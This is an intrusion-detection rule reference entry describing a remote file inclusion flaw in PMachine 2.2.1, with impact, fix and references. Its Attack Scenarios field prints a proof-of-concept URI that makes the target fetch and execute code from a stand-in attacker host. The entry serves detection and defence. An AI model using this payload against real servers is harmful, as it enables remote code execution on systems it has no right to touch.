| GEN:SID | 1:2226 |
| Message | WEB-PHP pmachine remote file include attempt |
| Summary | This event is generated when an attempt is made to exploit a known vulnerability in the PHP application pmachine.
|
| Impact | Execution of arbitrary code possibly leading to a remote shell.
|
| Detailed Information | Versions of PMachine do not properly check included files and it is possible for an attacker to include a file of their choosing which may lead to arbitrary code execution on the target host.
|
| Affected Systems | PMachine PMachine 2.2.1
|
| Attack Scenarios | The attacker can include a file of their choosing by appending the file URI to the end of a URI for the application.
Proof of concept URI by FrogMan:
http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=/badcode.txt
|
| Ease of Attack | Simple. No exploit software required.
|
| Corrective Action | Upgrade to the latest non-affected version of the software.
|
| Additional References | |
| Rule References | bugtraq: 7919
nessus: 11739
|